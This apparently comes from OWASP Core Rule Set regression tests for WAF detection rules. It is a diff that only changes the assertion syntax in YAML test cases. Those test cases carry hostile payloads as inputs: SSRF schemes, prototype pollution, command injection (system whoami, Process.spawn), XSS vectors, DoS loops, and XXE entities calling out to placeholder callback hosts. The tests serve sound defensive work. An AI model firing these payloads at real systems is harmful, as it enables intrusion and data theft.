local_file:// url scheme - Dotless decimal stages: @@ -838,4 +885,5 @@ tests: uri: "/get?ssrf=local_file://2852039166/" version: "HTTP/1.1" output: - log_contains: id "934120" + log: + expect_ids: [934120] 
diff --git a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934130.yaml b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934130.yaml index f18d6bc0a..d4fa4810c 100644 --- a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934130.yaml +++ b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934130.yaml @@ -18,7 +18,8 @@ tests: uri: "/get?foo=proto" version: HTTP/1.0 output: - no_log_contains: id "934130" + log: + no_expect_ids: [934130] - test_id: 2 desc: positive test case with JSON POST stages: @@ -36,7 +37,8 @@ tests: data: | {"text":"a","title":{"__proto__":{"where":{"name":"sqlinjection","where":null}}}} output: - log_contains: id "934130" + log: + expect_ids: [934130] - test_id: 3 desc: positive test case, CVE-2021-20083 stages: @@ -51,7 +53,8 @@ tests: uri: "/get?__proto__[test]=test" version: HTTP/1.0 output: - log_contains: id "934130" + log: + expect_ids: [934130] - test_id: 4 desc: positive test case, CVE-2021-20084, 1/2 stages: @@ -66,7 +69,8 @@ tests: uri: "/get?__proto__.test=test" version: HTTP/1.0 output: - log_contains: id "934130" + log: + expect_ids: [934130] - test_id: 5 desc: positive test case, CVE-2021-20084, 2/2 stages: @@ -81,7 +85,8 @@ tests: uri: "/get?constructor.prototype.test=test" version: HTTP/1.0 output: - log_contains: id "934130" + log: + expect_ids: [934130] - test_id: 6 desc: positive test case with space evasion, CVE-2021-20084, 2/2 stages: @@ -96,7 +101,8 @@ tests: uri: "/get?constructor.prototype.%20test=test" version: HTTP/1.0 output: - log_contains: id "934130" + log: + expect_ids: [934130] - test_id: 7 desc: positive test case with GET parameter, jQuery $.get stages: @@ -111,7 +117,8 @@ tests: uri: "/get?__proto__[context]=<img/src/onerror%3dalert(1)>" version: HTTP/1.0 output: - log_contains: id "934130" + log: + expect_ids: [934130] - test_id: 8 desc: positive test case with GET parameter, V4Fire Core Library stages: 
@@ -126,7 +133,8 @@ tests:
 uri: "/get?__proto__%5Btest%5D%3D%7B%22json%22%3A%22value%22%7D"
 version: HTTP/1.0
 output:
- log_contains: id "934130"
+ log:
+ expect_ids: [934130]
 - test_id: 9
 desc: positive test case with GET parameter, analytics-utils < 1.0.3
 stages:
@@ -141,7 +149,8 @@ tests:
 uri: "/get?constructor%5Bprototype%5D%5Btest%5D%3Dtest"
 version: HTTP/1.0
 output:
- log_contains: id "934130"
+ log:
+ expect_ids: [934130]
 - test_id: 10
 desc: positive test case with GET parameter, jQuery $.get
 stages:
@@ -156,7 +165,8 @@ tests:
 uri: "/get?__proto__[jquery]=x"
 version: HTTP/1.0
 output:
- log_contains: id "934130"
+ log:
+ expect_ids: [934130]
 - test_id: 11
 desc: positive test case with GET parameter, Vue.js
 stages:
@@ -171,7 +181,8 @@ tests:
 uri: "/get?__proto__%5Bv-bind%3Aclass%5D%3D%27%27.constructor.constructor%28%27alert%281%29%27%29%28%29"
 version: HTTP/1.0
 output:
- log_contains: id "934130"
+ log:
+ expect_ids: [934130]
 - test_id: 12
 desc: "Detect example payload __proto__... submitted as plaintext"
 stages:
@@ -187,7 +198,8 @@ tests:
 uri: "/get"
 version: HTTP/1.1
 output:
- log_contains: id "934130"
+ log:
+ expect_ids: [934130]
 - test_id: 13
 desc: "Detect example payload __proto__... submitted as plaintext with JavaScript escape sequence obfuscation"
 stages:
@@ -203,4 +215,5 @@ tests:
 uri: "/get"
 version: HTTP/1.1
 output:
- log_contains: id "934130"
+ log:
+ expect_ids: [934130]
diff --git a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934140.yaml b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934140.yaml
index 04d1dd2e4..f4fce6961 100644
--- a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934140.yaml
+++ b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934140.yaml
@@ -18,4 +18,5 @@ tests:
 uri: "/get?x=@{[system+whoami]}"
 version: HTTP/1.0
 output:
- log_contains: id "934140"
+ log:
+ expect_ids: [934140]
diff --git a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934150.yaml b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934150.yaml
index 744933f91..01a2b4598 100644
--- a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934150.yaml
+++ b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934150.yaml
@@ -18,4 +18,5 @@ tests:
 uri: "/get?x=Process.spawn(%22id%22)"
 version: HTTP/1.0
 output:
- log_contains: id "934150"
+ log:
+ expect_ids: [934150]
diff --git a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934160.yaml b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934160.yaml
index 6b4f240fc..437a05641 100644
--- a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934160.yaml
+++ b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934160.yaml
@@ -18,7 +18,8 @@ tests:
 uri: "/get?text=while%20(foo)%20is%20bar."
 version: HTTP/1.0
 output:
- no_log_contains: id "934160"
+ log:
+ no_expect_ids: [934160]
 - test_id: 2
 desc: while falsy with negations
 stages:
@@ -33,7 +34,8 @@ tests:
 uri: "/get?eval=while(!false)"
 version: HTTP/1.0
 output:
- log_contains: id "934160"
+ log:
+ expect_ids: [934160]
 - test_id: 3
 desc: while falsy with negations
 stages:
@@ -48,7 +50,8 @@ tests:
 uri: "/get?eval=while(!-0);"
 version: HTTP/1.0
 output:
- log_contains: id "934160"
+ log:
+ expect_ids: [934160]
 - test_id: 4
 desc: while falsy with negations
 stages:
@@ -63,7 +66,8 @@ tests:
 uri: "/get?eval=while(!%2B0);"
 version: HTTP/1.0
 output:
- log_contains: id "934160"
+ log:
+ expect_ids: [934160]
 - test_id: 5
 desc: while falsy with negations
 stages:
@@ -78,7 +82,8 @@ tests:
 uri: "/get?eval=while(!0);"
 version: HTTP/1.0
 output:
- log_contains: id "934160"
+ log:
+ expect_ids: [934160]
 - test_id: 6
 desc: while falsy with negations
 stages:
@@ -93,7 +98,8 @@ tests:
 uri: "/get?eval=while(!-0);"
 version: HTTP/1.0
 output:
- log_contains: id "934160"
+ log:
+ expect_ids: [934160]
 - test_id: 7
 desc: while falsy with negations
 stages:
@@ -108,7 +114,8 @@ tests:
 uri: '/get?eval=while(!"");'
 version: HTTP/1.0
 output:
- log_contains: id "934160"
+ log:
+ expect_ids: [934160]
 - test_id: 8
 desc: while falsy with negations
 stages:
@@ -123,7 +130,8 @@ tests:
 uri: "/get?eval=while(!'');"
 version: HTTP/1.0
 output:
- log_contains: id "934160"
+ log:
+ expect_ids: [934160]
 - test_id: 9
 desc: while falsy with negations
 stages:
@@ -138,7 +146,8 @@ tests:
 uri: "/get?eval=while(!``);"
 version: HTTP/1.0
 output:
- log_contains: id "934160"
+ log:
+ expect_ids: [934160]
 - test_id: 10
 desc: while truthy
 stages:
@@ -153,7 +162,8 @@ tests:
 uri: "/get?eval=while(true);"
 version: HTTP/1.0
 output:
- log_contains: id "934160"
+ log:
+ expect_ids: [934160]
 - test_id: 11
 desc: while truthy
 stages:
@@ -168,7 +178,8 @@ tests:
 uri: "/get?eval=while(Infinity);"
 version: HTTP/1.0
 output:
- log_contains: id "934160"
+ log:
+ expect_ids: [934160]
 - test_id: 12
 desc: while truthy
 stages:
@@ -183,7 +194,8 @@ tests:
 uri: "/get?eval=while(-Infinity);"
 version: HTTP/1.0
 output:
- log_contains: id "934160"
+ log:
+ expect_ids: [934160]
 - test_id: 13
 desc: while truthy
 stages:
@@ -198,7 +210,8 @@ tests:
 uri: "/get?eval=while(%2BInfinity);"
 version: HTTP/1.0
 output:
- log_contains: id "934160"
+ log:
+ expect_ids: [934160]
 - test_id: 14
 desc: while truthy
 stages:
@@ -213,7 +226,8 @@ tests:
 uri: "/get?eval=while(-1);"
 version: HTTP/1.0
 output:
- log_contains: id "934160"
+ log:
+ expect_ids: [934160]
 - test_id: 15
 desc: while truthy
 stages:
@@ -228,7 +242,8 @@ tests:
 uri: "/get?eval=while(%2B1);"
 version: HTTP/1.0
 output:
- log_contains: id "934160"
+ log:
+ expect_ids: [934160]
 - test_id: 16
 desc: while truthy
 stages:
@@ -243,7 +258,8 @@ tests:
 uri: "/get?eval=while(new%20Date);"
 version: HTTP/1.0
 output:
- log_contains: id "934160"
+ log:
+ expect_ids: [934160]
 - test_id: 17
 desc: while truthy
 stages:
@@ -258,7 +274,8 @@ tests:
 uri: "/get?eval=while(this);"
 version: HTTP/1.0
 output:
- log_contains: id "934160"
+ log:
+ expect_ids: [934160]
 - test_id: 18
 desc: while truthy
 stages:
@@ -273,7 +290,8 @@ tests:
 uri: "/get?eval=while(String);"
 version: HTTP/1.0
 output:
- log_contains: id "934160"
+ log:
+ expect_ids: [934160]
 - test_id: 19
 desc: while truthy with negation (false positive)
 stages:
@@ -288,7 +306,8 @@ tests:
 uri: "/get?eval=while(!true);"
 version: HTTP/1.0
 output:
- no_log_contains: id "934160"
+ log:
+ no_expect_ids: [934160]
 - test_id: 20
 desc: while truthy with double negation
 stages:
@@ -303,7 +322,8 @@ tests:
 uri: "/get?eval=while(!!{});"
 version: HTTP/1.0
 output:
- log_contains: id "934160"
+ log:
+ expect_ids: [934160]
 - test_id: 21
 desc: while truthy with double negation
 stages:
@@ -318,7 +338,8 @@ tests:
 uri: "/get?eval=while(!![]);"
 version: HTTP/1.0
 output:
- log_contains: id "934160"
+ log:
+ expect_ids: [934160]
 - test_id: 22
 desc: while truthy with double negation
 stages:
@@ -333,7 +354,8 @@ tests:
 uri: '/get?eval=while(!!"");'
 version: HTTP/1.0
 output:
- log_contains: id "934160"
+ log:
+ expect_ids: [934160]
 - test_id: 23
 desc: while truthy with double negation
 stages:
@@ -348,7 +370,8 @@ tests:
 uri: "/get?eval=while(!!'');"
 version: HTTP/1.0
 output:
- log_contains: id "934160"
+ log:
+ expect_ids: [934160]
 - test_id: 24
 desc: while truthy with double negation
 stages:
@@ -363,7 +386,8 @@ tests:
 uri: "/get?eval=while(!!``);"
 version: HTTP/1.0
 output:
- log_contains: id "934160"
+ log:
+ expect_ids: [934160]
 - test_id: 25
 desc: while falsy with negation
 stages:
@@ -378,7 +402,8 @@ tests:
 uri: "/get?eval=while(!null)"
 version: HTTP/1.0
 output:
- log_contains: id "934160"
+ log:
+ expect_ids: [934160]
 - test_id: 26
 desc: while falsy with negation
 stages:
@@ -393,7 +418,8 @@ tests:
 uri: "/get?eval=while(!undefined)"
 version: HTTP/1.0
 output:
- log_contains: id "934160"
+ log:
+ expect_ids: [934160]
 - test_id: 27
 desc: while falsy with negation
 stages:
@@ -408,7 +434,8 @@ tests:
 uri: "/get?eval=while(!NaN)"
 version: HTTP/1.0
 output:
- log_contains: id "934160"
+ log:
+ expect_ids: [934160]
 - test_id: 28
 desc: while truthy
 stages:
@@ -423,7 +450,8 @@ tests:
 uri: "/get?eval=while((true)))"
 version: HTTP/1.0
 output:
- log_contains: id "934160"
+ log:
+ expect_ids: [934160]
 - test_id: 29
 desc: "Detect example DoS loop while(true) submitted as plaintext"
 stages:
@@ -438,7 +466,8 @@ tests:
 uri: "/get?eval=while(true);"
 version: HTTP/1.1
 output:
- log_contains: id "934160"
+ log:
+ expect_ids: [934160]
 - test_id: 30
 desc: "Detect example DoS loop while(true) submitted as plaintext with JavaScript escape sequence obfuscation"
 stages:
@@ -453,7 +482,8 @@ tests:
 uri: "/get?eval=while(true);"
 version: HTTP/1.1
 output:
- log_contains: id "934160"
+ log:
+ expect_ids: [934160]
 - test_id: 31
 desc: "Detect example DoS loop while(true) submitted as plaintext that has been Base64 encoded"
 stages:
@@ -468,7 +498,8 @@ tests:
 uri: "/get?eval=d2hpbGUodHJ1ZSk7Cg%3D%3D"
 version: HTTP/1.1
 output:
- log_contains: id "934160"
+ log:
+ expect_ids: [934160]
 - test_id: 32
 desc: "Detect example DoS loop while(true) submitted as plaintext with JavaScript escape sequence obfuscation that has been Base64 encoded"
 stages:
@@ -483,7 +514,8 @@ tests:
 uri: "/get?eval=XHUwMDc3XHUwMDY4aWxlKHRydWUpOwo%3D"
 version: HTTP/1.1
 output:
- log_contains: id "934160"
+ log:
+ expect_ids: [934160]
 - test_id: 33
 desc: "Detect example DoS loop while(true) submitted as plaintext that has been Base64 encoded and then obfuscated with JavaScript escape sequences"
 stages:
@@ -498,4 +530,5 @@ tests:
 uri: "/get?eval=d2hpbGUodHJ1ZSk7Cg%3D%3D"
 version: HTTP/1.1
 output:
- log_contains: id "934160"
+ log:
+ expect_ids: [934160]
diff --git a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934170.yaml b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934170.yaml
index 8348a8bb9..2505e4abe 100644
--- a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934170.yaml
+++ b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934170.yaml
@@ -20,7 +20,8 @@ tests:
 uri: "/get?ssrf=data:text/plain;base64,SSBsb3ZlIFBIUAo="
 version: "HTTP/1.1"
 output:
- log_contains: id "934170"
+ log:
+ expect_ids: [934170]
 - test_id: 2
 desc: "Negative test - data:// should not match"
 stages:
@@ -37,7 +38,8 @@ tests:
 uri: "/get?ssrf=data://text/plain;base64,SSBsb3ZlIFBIUAo="
 version: "HTTP/1.1"
 output:
- no_log_contains: id "934170"
+ log:
+ no_expect_ids: [934170]
 - test_id: 3
 desc: "Status Page Test - SSRF - data: scheme test - simple trigger, isolated test"
 stages:
@@ -54,4 +56,5 @@ tests:
 uri: "/get?ssrf=data:text/plain"
 version: "HTTP/1.1"
 output:
- log_contains: id "934170"
+ log:
+ expect_ids: [934170]
diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941100.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941100.yaml
index a198c9b50..edea0617d 100644
--- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941100.yaml
+++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941100.yaml
@@ -18,7 +18,8 @@ tests:
 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
 version: "HTTP/1.1"
 output:
- log_contains: id "941100"
+ log:
+ expect_ids: [941100]
 - test_id: 2
 desc: XSS in XML Test as described in http://www.client9.com/article/five-interesting-injection-attacks/
 stages:
@@ -33,7 +34,8 @@ tests:
 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
 version: "HTTP/1.1"
 output:
- log_contains: id "941100"
+ log:
+ expect_ids: [941100]
 - test_id: 3
 desc: XSS testing of libinjection in User-Agent
 stages:
@@ -48,7 +50,8 @@ tests:
 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
 version: "HTTP/1.1"
 output:
- log_contains: id "941100"
+ log:
+ expect_ids: [941100]
 - test_id: 4
 desc: XSS testing of libinjection in User-Agent
 stages:
@@ -64,7 +67,8 @@ tests:
 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
 version: "HTTP/1.1"
 output:
- no_log_contains: id "941100"
+ log:
+ no_expect_ids: [941100]
 - test_id: 5
 desc: XSS testing of libinjection in User-Agent
 stages:
@@ -80,7 +84,8 @@ tests:
 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
 version: "HTTP/1.1"
 output:
- no_log_contains: id "941100"
+ log:
+ no_expect_ids: [941100]
 - test_id: 6
 desc: Status Page Test - simplified XSS testing of libinjection in ARGS
 stages:
@@ -96,4 +101,5 @@ tests:
 data: foo=<xss onbeforehellfreezes%3Daler%77(1)>
 version: "HTTP/1.1"
 output:
- log_contains: id "941100"
+ log:
+ expect_ids: [941100]
diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941101.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941101.yaml
index 7b42a9758..8d1bc6368 100644
--- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941101.yaml
+++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941101.yaml
@@ -18,7 +18,8 @@ tests:
 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
 version: "HTTP/1.1"
 output:
- log_contains: id "941101"
+ log:
+ expect_ids: [941101]
 - test_id: 2
 stages:
 - input:
@@ -32,7 +33,8 @@ tests:
 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
 version: "HTTP/1.1"
 output:
- log_contains: id "941101"
+ log:
+ expect_ids: [941101]
 - test_id: 3
 desc: "SVG onload injection in filename"
 stages:
@@ -47,4 +49,5 @@ tests:
 uri: "/get/index.php/%3Csvg/onload=alert()"
 version: HTTP/1.0
 output:
- log_contains: id "941101"
+ log:
+ expect_ids: [941101]
diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941110.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941110.yaml
index a8cf44d7a..d1b88c709 100644
--- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941110.yaml
+++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941110.yaml
@@ -19,7 +19,8 @@ tests:
 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
 version: "HTTP/1.1"
 output:
- log_contains: id "941110"
+ log:
+ expect_ids: [941110]
 - test_id: 2
 desc: Test as described in http://www.client9.com/article/five-interesting-injection-attacks/
 stages:
@@ -34,7 +35,8 @@ tests:
 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
 version: "HTTP/1.1"
 output:
- log_contains: id "941110"
+ log:
+ expect_ids: [941110]
 - test_id: 3
 desc: Test as described in http://www.client9.com/article/five-interesting-injection-attacks/
 stages:
@@ -49,7 +51,8 @@ tests:
 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
 version: "HTTP/1.1"
 output:
- log_contains: id "941110"
+ log:
+ expect_ids: [941110]
 - test_id: 4
 desc: Test as described in http://www.client9.com/article/five-interesting-injection-attacks/
 stages:
@@ -65,7 +68,8 @@ tests:
 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
 version: "HTTP/1.1"
 output:
- log_contains: id "941110"
+ log:
+ expect_ids: [941110]
 - test_id: 5
 desc: XSS in URI / PATH_INFO going undetected - GH issue 1022
 stages:
@@ -80,7 +84,8 @@ tests:
 User-Agent: "OWASP CRS test agent"
 version: "HTTP/1.1"
 output:
- log_contains: id "941110"
+ log:
+ expect_ids: [941110]
 - test_id: 6
 desc: XSS in payload using %uNNNN
 stages:
@@ -98,7 +103,8 @@ tests:
 var=%uff1cscript%u0020%uff1ealert%281%29%uff1c/script%uff1e
 version: "HTTP/1.1"
 output:
- log_contains: id "941110"
+ log:
+ expect_ids: [941110]
 - test_id: 7
 desc: XSS in payload with individual code points urlencoded
 stages:
@@ -116,7 +122,8 @@ tests:
 var=%ef%bc%9cscript%20%ef%bc%9ealert%281%29%ef%bc%9c/script%ef%bc%9e
 version: "HTTP/1.1"
 output:
- log_contains: id "941110"
+ log:
+ expect_ids: [941110]
 - test_id: 8
 desc: XSS in cookie name using unicode
 stages:
@@ -132,7 +139,8 @@ tests:
 Cookie: <script >alert(1)</script>=value
 version: "HTTP/1.1"
 output:
- log_contains: id "941110"
+ log:
+ expect_ids: [941110]
 - test_id: 9
 desc: XSS in Referer using html entities
 stages:
@@ -148,7 +156,8 @@ tests:
 User-Agent: "OWASP CRS test agent"
 version: "HTTP/1.1"
 output:
- log_contains: id "941110"
+ log:
+ expect_ids: [941110]
 - test_id: 10
 desc: GH issue 1481
 stages:
@@ -163,4 +172,5 @@ tests:
 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
 version: "HTTP/1.1"
 output:
- no_log_contains: id "941110"
+ log:
+ no_expect_ids: [941110]
diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941120.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941120.yaml
index d5d2580c7..004cc9e13 100644
--- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941120.yaml
+++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941120.yaml
@@ -17,7 +17,8 @@ tests:
 uri: "/post?%20%20onload%3d%20=vardata"
 version: HTTP/1.0
 output:
- log_contains: id "941120"
+ log:
+ expect_ids: [941120]
 - test_id: 2
 desc: "XSS Filter - Category 2: Event Handler Vector"
 stages:
@@ -32,7 +33,8 @@ tests:
 uri: "/post?%20%20onabcdefgh%3d%20=vardata"
 version: HTTP/1.0
 output:
- log_contains: id "941120"
+ log:
+ expect_ids: [941120]
 - test_id: 3
 desc: "XSS Filter - Category 2: Event Handler Vector"
 stages:
@@ -47,7 +49,8 @@ tests:
 uri: "/post?%20%20onab%3d%20=vardata"
 version: HTTP/1.0
 output:
- no_log_contains: id "941120"
+ log:
+ no_expect_ids: [941120]
 - test_id: 4
 desc: "XSS Filter - Category 2: Event Handler Vector"
 stages:
@@ -62,7 +65,8 @@ tests:
 uri: "/post?%20%20onabcdefghijklmnopqrstuvwxyz%3d%20=vardata"
 version: HTTP/1.0
 output:
- no_log_contains: id "941120"
+ log:
+ no_expect_ids: [941120]
 - test_id: 5
 desc: "XSS Filter - Category 2: Event Handler Vector"
 stages:
@@ -78,7 +82,8 @@ tests:
 uri: "/get"
 version: "HTTP/1.1"
 output:
- no_log_contains: id "941120"
+ log:
+ no_expect_ids: [941120]
 - test_id: 6
 desc: "SVG onload injection in filename"
 stages:
@@ -93,4 +98,5 @@ tests:
 uri: "/get/index.php/%3Csvg/onload=alert()"
 version: HTTP/1.0
 output:
- log_contains: id "941120"
+ log:
+ expect_ids: [941120]
diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941130.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941130.yaml
index a856409c0..4a053dcd1 100644
--- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941130.yaml
+++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941130.yaml
@@ -18,7 +18,8 @@ tests:
 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
 version: "HTTP/1.1"
 output:
- log_contains: id "941130"
+ log:
+ expect_ids: [941130]
 - test_id: 2
 desc: "XSS test for 941130"
 stages:
@@ -34,7 +35,8 @@ tests:
 data: "var=555-555-0199@example.com'||(select extractvalue(xmltype('<?xml version=\"1.0\" encoding=\"UTF-8\"?><!DOCTYPE root [ <!ENTITY % lbsod SYSTEM \"http://im8vx9fw5e2ibzctphxn9vauwl2m0joncfz5nu.example'||'foo.bar/\">%lbsod;"
 version: HTTP/1.0
 output:
- log_contains: id "941130"
+ log:
+ expect_ids: [941130]
 - test_id: 3
 desc: "XSS test for 941130"
 stages:
@@ -50,7 +52,8 @@ tests:
 data: "var=<aai xmlns=\"http://a.b/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:schemaLocation=\"http://a.b/ http://c5ipg3yqo8lcutvn8bghsptofflee424qxdq1f.examplefoo.bar/aai.xsd\">aai</aai>"
 version: HTTP/1.0
 output:
- log_contains: id "941130"
+ log:
+ expect_ids: [941130]
 - test_id: 4
 desc: "XSS test for 941130"
 stages:
@@ -66,7 +69,8 @@ tests:
 data: "var=abcd'||(select extractvalue(xmltype('<?xml version=\"1.0\" encoding=\"UTF-8\"?><!DOCTYPE root [ <!ENTITY % cgger SYSTEM \"http://ved8pm79xruv3c46hup01827oyuzxtlx9qwjk8.example'||'foo.bar/\">%cgger;"
 version: HTTP/1.0
 output:
- log_contains: id "941130"
+ log:
+ expect_ids: [941130]
 - test_id: 5
 desc: "XSS test for 941130"
 stages:
@@ -82,7 +86,8 @@ tests:
 data: "var=<acp xmlns:xi=\"http://www.w3.org/2001/XInclude\"><xi:include href=\"http://sgc5rj96zows5963jrrx3544qvwtnubvzomfa4.examplefoo.bar/foo\"/></acp>"
 version: HTTP/1.0
 output:
- log_contains: id "941130"
+ log:
+ expect_ids: [941130]
 - test_id: 6
 desc: "XSS test for 941130"
 stages:
@@ -98,7 +103,8 @@ tests:
 data: "var=/active/LFI/LFI-Detection-Evaluation-POST-200Valid/content.ini'||(select extractvalue(xmltype('<?xml version=\"1.0\" encoding=\"UTF-8\"?><!DOCTYPE root [ <!ENTITY % grorj SYSTEM \"http://yikbtpbc1uyy7f89lxt35b6as1yw1qpudm0co1.example'||'foo.bar/\">%grorj;"
 version: HTTP/1.0
 output:
- log_contains: id "941130"
+ log:
+ expect_ids: [941130]
 - test_id: 7
 desc: "XSS test for 941130"
 stages:
@@ -114,7 +120,8 @@ tests:
 data: "var=<afa xmlns=\"http://a.b/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:schemaLocation=\"http://a.b/ http://2mpfxtfg5y22bjcdp1x79faew52420q0er1hp6.examplefoo.bar/afa.xsd\">afa</afa>"
 version: HTTP/1.0
 output:
- log_contains: id "941130"
+ log:
+ expect_ids: [941130]
 - test_id: 8
 desc: "XSS test for 941130"
 stages:
@@ -130,7 +137,8 @@ tests:
 data: "var=<chj xmlns=\"http://a.b/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:schemaLocation=\"http://a.b/ http://1pre0sif8x51eifcs006ceddz45084w4kx7ovd.examplefoo.bar/chj.xsd\">chj</chj>"
 version: HTTP/1.0
 output:
- log_contains: id "941130"
+ log:
+ expect_ids: [941130]
 - test_id: 9
 desc: "XSS test for 941130"
 stages:
@@ -146,7 +154,8 @@ tests:
 data: "var=/content.ini'||(select extractvalue(xmltype('<?xml version=\"1.0\" encoding=\"UTF-8\"?><!DOCTYPE root [ <!ENTITY % dwusu SYSTEM \"http://ehzrs5as0axe6v7pkdsj4r5qrhxcp6da12osch.example'||'foo.bar/\">%dwusu;"
 version: HTTP/1.0
 output:
- log_contains: id "941130"
+ log:
+ expect_ids: [941130]
 - test_id: 10
 desc: "XSS test for 941130"
 stages:
@@ -162,7 +171,8 @@ tests:
 data: "var=EmptyValue'||(select extractvalue(xmltype('<?xml version=\"1.0\" encoding=\"UTF-8\"?><!DOCTYPE root [ <!ENTITY % awpsd SYSTEM \"http://0cddnr5evws01h2bfzn5zd0cm3sxvrjv7oufi4.example'||'foo.bar/\">%awpsd;"
 version: HTTP/1.0
 output:
- log_contains: id "941130"
+ log:
+ expect_ids: [941130]
 - test_id: 11
 desc: "XSS test for 941130"
 stages:
@@ -178,7 +188,8 @@ tests:
 data: "var=file:/boot.ini'||(select extractvalue(xmltype('<?xml version=\"1.0\" encoding=\"UTF-8\"?><!DOCTYPE root [ <!ENTITY % cwtpc SYSTEM \"http://gvft67ouecbgkxlryf6litjs5jbd5htlhd43ss.example'||'foo.bar/\">%cwtpc;"
 version: HTTP/1.0
 output:
- log_contains: id "941130"
+ log:
+ expect_ids: [941130]
 - test_id: 12
 desc: "XSS test for 941130"
 stages:
@@ -194,7 +205,8 @@ tests:
 data: "var=Matched Data: <!ENTITY % awfke SYSTEM found within ARGS_NAMES:1'||(select extractvalue(xmltype('<?xml version=\"1.0\" encoding=\"UTF-8\"?><!DOCTYPE root [ <!ENTITY % awfke SYSTEM \"http://gj3tu7cu2czg8x9rmful6t7stjzcp4d812osch.example'||'foo.bar/\">%awfke;"
 version: HTTP/1.0
 output:
- log_contains: id "941130"
+ log:
+ expect_ids: [941130]
 - test_id: 13
 desc: "XSS test for 941130"
 stages:
@@ -210,7 +222,8 @@ tests:
 data: "var=<oez xmlns=\"http://a.b/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:schemaLocation=\"http://a.b/ http://eygr95rshaeenvop1d9jlrmq8hegib6bu4hx5m.examplefoo.bar/oez.xsd\">oez</oez>"
 version: HTTP/1.0
 output:
- log_contains: id "941130"
+ log:
+ expect_ids: [941130]
 - test_id: 14
 desc: "XSS test for 941130"
 stages:
@@ -226,7 +239,8 @@ tests:
 data: "var=(select extractvalue(xmltype('<?xml version=\"1.0\" encoding=\"UTF-8\"?><!DOCTYPE root [ <!ENTITY % anwyn SYSTEM \"http://y98bkp2csupyyfz9cxk3wbxaj1pzuzi26vtohd.example'||'foo.bar/\">%anwyn;"
 version: HTTP/1.0
 output:
- log_contains: id "941130"
+ log:
+ expect_ids: [941130]
 - test_id: 15
 desc: "XSS test for 941130"
 stages:
@@ -242,7 +256,8 @@ tests:
